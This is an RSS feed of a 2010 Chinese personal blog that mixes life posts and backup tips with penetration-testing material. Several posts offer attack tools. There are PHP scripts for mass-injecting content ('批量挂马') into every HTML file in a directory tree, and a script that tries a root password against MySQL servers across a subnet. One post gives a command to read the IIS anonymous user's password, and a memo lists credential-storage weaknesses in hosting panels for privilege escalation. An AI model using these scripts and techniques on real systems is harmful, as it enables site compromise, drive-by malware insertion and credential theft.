<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[Robert's blog]]></title>
<link>http://blog.cnmoker.org/</link>
<description><![CDATA[技术成就梦想|黑客|技术|dedecms开发|seo]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[root@cnmoker.org(Robert)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>Robert&#39;s blog</title>
	<url>http://blog.cnmoker.org/images/logos.gif</url>
	<link>http://blog.cnmoker.org/</link>
	<description>Robert&#39;s blog</description>
</image>

			<item>
			<link>http://blog.cnmoker.org/article.asp?id=433</link>
			<title><![CDATA[dedecms有感]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[杂七杂八]]></category>
			<pubDate>Mon,08 Mar 2010 17:00:06 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=433</guid>
		<description><![CDATA[今天发现自己的网站被人挂了个链接<br/>立刻检查网站..发现已经被日了...<br/>更加悲剧的是.IDC服务器所有网站都没有开通IIS日志功能,,,<br/>这家IDC我很无语的说...<br/>没办法...只有到网上转转...<br/>于是看到了dedecms被曝漏洞....<br/>下了个新版测试了下,还是有漏洞存在...<br/>我很崩溃..<br/>到dedecms论坛上去发帖...<br/><br/>居然&#34;漏洞&#34;二字成了屏蔽字<br/>难道dede的ceo是gcd的??<br/>把这习惯继承的天衣无缝......<br/><br/>我不反对,对自身产品的保护,但是居然把这两个字在自己论坛设置成屏蔽字,我很难理解...............<br/><br/>最后无奈改成pinyin缩写...<br/>dede的人好像还不知道....<br/>我觉得即使柏拉图离开了dede,也不能麻痹到这个地步吧...<br/><br/>我也有同门师兄在dede ,对dede并无恶意相加的意识,但是实在是对dede很无语,..<br/>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=432</link>
			<title><![CDATA[再次辞职]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[生活杂谈]]></category>
			<pubDate>Thu,25 Feb 2010 11:45:41 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=432</guid>
		<description><![CDATA[再次选择辞职了...<br/>事隔才半年...<br/>未来的路还是很遥远啊.........<br/>都不知道自己会什么]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=430</link>
			<title><![CDATA[获取iis用户密码]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[网络渗透]]></category>
			<pubDate>Wed,17 Feb 2010 20:13:07 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=430</guid>
		<description><![CDATA[使用adsutil.vbs<br/>并且注意要改下设置<br/>IsSecureProperty = False<br/>原值是true<br/>改成false才能显示密码<br/>语法命令cscript.exe c:\adsutil.vbs get w3svc/<span style="color:Red">siteid</span>/root/anonymoususerpass<br/><br/>例如cscript.exe c:\adsutil.vbs get w3svc/218922181/root/anonymoususerpass<br/><br/>这个id号存在于C:\WINDOWS\system32\inetsrv\MetaBase.xml<br/>中的IIsWebServer Location=&#34;/LM/W3SVC/218922181&#34;<br/><br/>悲剧的是想在注册表里获取,没搜索到,,<br/>哪位大牛还知道可以从其他渠道获取这个值吗??<br/>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=429</link>
			<title><![CDATA[一下拉了200多个qq好友]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[生活杂谈]]></category>
			<pubDate>Tue,16 Feb 2010 18:06:50 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=429</guid>
		<description><![CDATA[也不知道是那里来的疯狗,,大年三十就咬了一下,,,上来就百度我的名字...悲剧,身份证号码被这厮弄去了...<br/>早先的时候在my.qq.com填写过资料..<br/>相信很多老用户都填写过..<br/><br/>说实话,这次还算好,对方是个菜鸟,拿我的名字去百度,只得到少量有用的信息,而且都是可以说假的,因为我填写的时候就是假的,不过这些信息确实是我填写的...更搞笑的是,他加我qq跟我说他百度到的信息,直接的方式,原意是想要挟我+显示他的实力,显然一听到这个消息,我的心就平静了,因为那些是假的,而且我还知道了他是何种渠道弄到的这些东西.所以说,操之过急,就会暴露自己.在没有从第三方渠道确认消息的可靠性的时候,千万不要对当事人提及你的消息.<br/>信息安全啊!很惭愧啊.<br/>之前还考虑要不要把这个细节写在博客上,最后还是决定写,不怕被心理阴暗者看到,因为即使他们看到了,做事的时候也会忽略,只有心理阳光的人,在能在实战中劳记经验,一般的匪徒,因为各种杂念,是不容易记住这些细节的.<br/><br/>发现腾讯两个不安全设计 ,其中一个 比较危险 <br/>第一个是my.qq.com里 身份信息里证件号码 点更新就全部显示出来了,之前显示星号就毫无意义了<br/>第二个是那个快速登录功能.比如,我的qq被改密码后下线了,但是我没关qq的话,在qq.com里我还是能任意通行的<br/>即使密码被更改.而且在qq安全中心多了个密保重置的功能,我还能在里面更改密保资料...<br/>这个问题比较严重...<br/><br/>腾讯的安全审核机制太挫了..]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=428</link>
			<title><![CDATA[PHP批量挂马]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[工具分享]]></category>
			<pubDate>Mon,08 Feb 2010 21:59:02 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=428</guid>
		<description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 转 混世魔王 blog<br/><br/>写入文件头<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php<br/>ini_set(&#34;max_execution_time&#34;,0);<br/>$dir = &#34;Z:/soft/111/bf&#34;; <br/><br/>function view_dir($directory)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$handle = opendir( $directory );<br/>&nbsp;&nbsp;&nbsp;&nbsp;while ( $file = readdir($handle) )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$bdir = $directory . &#39;/&#39; .$file;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if ($file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39; &amp;&amp; is_dir($bdir))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;view_dir( $directory .&#39;/&#39;. $file);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else if( $file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(strstr(strtolower($directory.&#39;/&#39;.$file),&#34;.htm&#34;)||strstr(strtolower($directory.&#39;/&#39;.$file),&#34;.html&#34;)){<br/>&nbsp;&nbsp; $content=file_get_contents($directory .&#39;/&#39;. $file);<br/>&nbsp;&nbsp; $content=&#39;xxxxxx&#39;.$content;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fwrite(fopen($directory .&#39;/&#39;. $file,&#34;w&#34;),$content);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;closedir( $handle );<br/>}<br/>view_dir($dir);<br/>?&gt;<br/><br/></div></div><br/><br/>写入文件尾部<br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php<br/>ini_set(&#34;max_execution_time&#34;,0);<br/>$dir = &#34;C:\\APMServ5.2.6\\www\\htdocs\\replacer&#34;; <br/><br/>function view_dir($directory)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$handle = opendir( $directory );<br/>&nbsp;&nbsp;&nbsp;&nbsp;while ( $file = readdir($handle) )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$bdir = $directory . &#39;/&#39; .$file;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if ($file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39; &amp;&amp; is_dir($bdir))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;view_dir( $directory .&#39;/&#39;. $file);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else if( $file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(strstr(strtolower($directory.&#39;/&#39;.$file),&#34;.htm&#34;)||strstr(strtolower<br/><br/>($directory.&#39;/&#39;.$file),&#34;.html&#34;)){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$content=fwrite(fopen($directory .&#39;/&#39;. $file,&#34;a+&#34;),&#39;xxxxxx&#39;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;closedir( $handle );<br/>}<br/>view_dir($dir);<br/>?&gt;<br/><br/></div></div><br/><br/><br/>替换插入<br/><br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php<br/>ini_set(&#34;max_execution_time&#34;,0);<br/>$dir = &#34;C:\\APMServ5.2.6\\www\\htdocs\\replacer&#34;; <br/><br/>function view_dir($directory)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$handle = opendir( $directory );<br/>&nbsp;&nbsp;&nbsp;&nbsp;while ( $file = readdir($handle) )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$bdir = $directory . &#39;/&#39; .$file;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if ($file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39; &amp;&amp; is_dir($bdir))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;view_dir( $directory .&#39;/&#39;. $file);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else if( $file &lt;&gt; &#39;.&#39; &amp;&amp; $file &lt;&gt; &#39;..&#39;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(strstr(strtolower($directory.&#39;/&#39;.$file),&#34;.htm&#34;)||strstr(strtolower($directory.&#39;/&#39;.$file),&#34;.html&#34;)){<br/>&nbsp;&nbsp; $content=file_get_contents($directory .&#39;/&#39;. $file);<br/>&nbsp;&nbsp; $content=str_replace(&#39;&lt;/head&gt;&#39;,&#39;xxxxxxxxxxxx&#39;,$content);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fwrite(fopen($directory .&#39;/&#39;. $file,&#34;w&#34;),$content);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;closedir( $handle );<br/>}<br/>view_dir($dir);<br/>?&gt;<br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=427</link>
			<title><![CDATA[国内虚拟主机软件弱点备忘录(持续更新)]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[网络渗透]]></category>
			<pubDate>Mon,01 Feb 2010 10:39:23 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=427</guid>
		<description><![CDATA[<span style="color:Red">因时间原因,会持续更新,同时您有相关的信息,方便共享的话,请mail:root@cnmoker.org,thks</span><br/><br/>蓝芒 BlueManage<br/><br/>首先蓝芒的代码经过zend.我们可以使用黑刀进行解密.<br/>蓝芒的密码是存储在blh5_userinfo表里并且密码是经过key加的密码<br/>加密的key保存在x:\BlueManage\conf_default\config.php 文件里,并且这个文件不经过zend,因为方便客户更改<br/>同时root密码也保存在此文件<br/><br/>后台需要前台管理员才能看到登陆界面.不然一律提示拒绝<br/><br/>关键代码可查看解密后的根目录下的admincp.php<br/><br/>代码如下<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">include_once( &#34;system/common/common.php&#34; );<br/>if ( !defined( &#34;IN_BLH5_SYSTEM&#34; ) )<br/>{<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;exit( &#34;Access Denied. Copyrights (C) BlueLight Hosting 5.0.0&#34; );<br/>}</div></div><br/><br/>目录关键字<br/>x:\Vhost\WebRoot<br/>这个不一定准.可做参考<br/><br/>星外 7i24.com<br/>星外虚拟主机系统从目前公布的漏洞情况看,是比较安全的.他的目录结构比较清晰,分工明确.国内紫田网络基本上都是采用星外的系统的.<br/>我测试目前主要有以下两个漏洞<br/>第一,如果是7i24+serv-u的主机,一般注册表里可以读出很多东西.在注册表HKLM项的software项里,保存有serv-u的路径,密码等信息.而且如果是安装了imail的话,有一个本地提权漏洞关于imail的位于如下注册表.<br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\IMail</div></div><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">C:\Program Files\Ipswitch\IMail\</div></div><br/>总之注册表利用在提权中也是非常重要的,这点大家一定要记得.<br/>并不是星外才有这个弱点<br/>第二,星外的后台存储的比如mssql密码,mysql密码等,都可以用一般的密码读取工具读出来,这一点也算是一个弱点吧,不过有个前提条件就是必须有后台权限.<br/>我有一次得到一个mssql的一般权限用户,这个用户有读星外库的权限,读到后台管理密码后,登陆,查到sa密码提权成功,所以也是要注意的.<br/>还有一个要注意的,也在这里说了.星外也有这个毛病就是.<br/>mysql的data目录,一般来说,user或者干脆iis用户是有读或者完全控制权限的.<br/>这点也很危险,基本上控制了data,这个虚拟主机下的所有基于mysql的网站就game over了<br/>随之带来的风险,可想而知.<br/><br/>hzhost 华众<br/>这个不用说,注入漏洞就出了几个.我稍后再这个文章总结下.<br/>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=426</link>
			<title><![CDATA[Oracle Hash Crack Online]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[杂七杂八]]></category>
			<pubDate>Fri,29 Jan 2010 22:44:05 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=426</guid>
		<description><![CDATA[<a href="http://ops.conus.info/" target="_blank" rel="external">http://ops.conus.info/</a>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=425</link>
			<title><![CDATA[简单的MYSQL服务器猜密码脚本]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[网络渗透]]></category>
			<pubDate>Tue,26 Jan 2010 14:33:30 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=425</guid>
		<description><![CDATA[转自4ngel<br/><br/>昨日渗透时 ， 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。<br/><br/>这个是已知开了3306的。。<br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php<br/><br/>$hostdb = array(<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.10&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.20&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.20&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.40&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.50&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.60&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.70&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.80&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.90&#39;,<br/>&#160;&#160;&#160;&#160;&#39;192.168.168.100&#39;<br/>);<br/><br/>$dbu = &#39;root&#39;;<br/>$dbp = &#39;1qaz2wsx&#39;;<br/><br/>foreach ($hostdb as $host) {<br/>&#160;&#160;&#160;&#160;if(@mysql_connect($host, $dbu, $dbp)) {<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;echo $host.&#39; - &#39;.$dbu.&#39; - &#39;.$dbp.&#39; ... OK&lt;br&gt;&#39;;<br/>&#160;&#160;&#160;&#160;}<br/>}<br/><br/>echo &#39;done.&#39;;<br/><br/>?&gt;</div></div><br/><br/>举一反三，这是全段猜的。<br/><br/><div class="UBBPanel codePanel"><div class="UBBTitle"><img src="http://blog.cnmoker.org/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent">&lt;?php<br/><br/>$ips = &#39;192.168.168.&#39;;<br/>$dbu = &#39;root&#39;;<br/>$dbp = &#39;1qaz2wsx&#39;;<br/><br/>for ($i=1; $i&lt;254; $i++) {<br/>&#160;&#160;&#160;&#160;if(@mysql_connect($ips.$i, $dbu, $dbp)) {<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;echo $ips.$i.&#39; - &#39;.$dbu.&#39; - &#39;.$dbp.&#39; ... OK&lt;br&gt;&#39;;<br/>&#160;&#160;&#160;&#160;}<br/>}<br/><br/>echo &#39;done.&#39;;<br/><br/>?&gt;</div></div><br/><br/>ps:现在很多虚拟机都是以sq_baidu用户名,baiducom为密码或者密码都是有规律的..<br/><br/>这个脚本发挥下的话.效果很好.算是自动化渗透工具的一个很好的思路!!]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=424</link>
			<title><![CDATA[关于mysql数据库的双机热备问题]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[杂七杂八]]></category>
			<pubDate>Wed,30 Dec 2009 14:57:04 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=424</guid>
		<description><![CDATA[因为上一次的<a href="http://www.cnmoker.org" target="_blank">数据库</a>丢失事件,导致我的网站,数据倒退一个月,甚至一个网站排名直接下降了几十页.至今首页无法正常快照.<br/>其实之前对mysql的<a href="http://www.cnmoker.org" target="_blank">数据库</a>备份也做过一些.<br/>看过很多文档,但是我要说一点,什么叫热备??<br/>网上很多文章,所谓热备,都是copy data目录下的<a href="http://www.cnmoker.org" target="_blank">数据库</a>文件到另外的备份文件夹,然后上传到另一个主机..,事实上,在应用上,要延时很长时间,而且不能做到实时数据备份.<br/>如果一旦大的<a href="http://www.cnmoker.org" target="_blank">数据库</a>出现故障.数据肯定会倒退至少1-2个小时.<br/>而且如果是主机的灾难,那么可能在你还没上传的时候,主机就宕机了呢??<br/>mssql有差异备份,mysql也可以通过工具来实时对比<a href="http://www.cnmoker.org" target="_blank">数据库</a>进行实时备份.<br/>利用navicat for mysql这个软件,进行头一次的结构同步,然后进行二次的数据同步就可以.<br/>省了不少的麻烦<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://blog.cnmoker.org/article.asp?id=423</link>
			<title><![CDATA[最近]]></title>
			<author>root@cnmoker.org(admin)</author>
			<category><![CDATA[生活杂谈]]></category>
			<pubDate>Sat,26 Dec 2009 22:38:02 +0800</pubDate>
			<guid>http://blog.cnmoker.org/default.asp?id=423</guid>
		<description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;2009年就快要过去了,又一年,踌躇满志,消失在冷雨中.<br/>&nbsp;&nbsp;&nbsp;&nbsp;听着陈奕迅的&lt;不要说话&gt;,莫名的伤感,彷佛在喧嚣的城市里一个无人的草原.清凉,广阔,寂静.<br/>&nbsp;&nbsp;&nbsp;&nbsp;前几天,放在朋友服务器上的网站二度被删,头一次,是系统被重装,后一次,干脆就被格式化,装了个linux,<br/>辛苦几半年的网站,眼看着,毁于一旦.伤心了,想退出了.不仅仅是因为数据丢失,或许是需要重新洗牌的时候.<br/>这个事,更加让我坚定了一个理念,别人的话,只能半信.虽然这话在博客上说出来,似乎并不甚好.但是我还是选择了宣泄.<br/>&nbsp;&nbsp;&nbsp;&nbsp;想着换工作,踌躇满志的过年后,要换个工作,换个自己喜欢的.投了很多简历后,却生出反思,自己能力是否达到了那个层次?或许是失败后的自卑,没有勇气面对失败?究竟那个更接近我些呢?<br/>&nbsp;&nbsp;&nbsp;&nbsp;和朋友搞了VPN项目,没想到,最后还是半夭折状态,实在是对不起,主要是担心两个,一个是在朋友心里,信誉有损,<br/>虽然这个是无可奈何的事情.以后要谨慎,不要有什么好想法都嚷嚷搞项目了.要知道,一个项目启动后,是几个人在劳动,不是你一个人.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;就这些..想起什么再补吧.]]></description>
		</item>
		
</channel>
</rss>
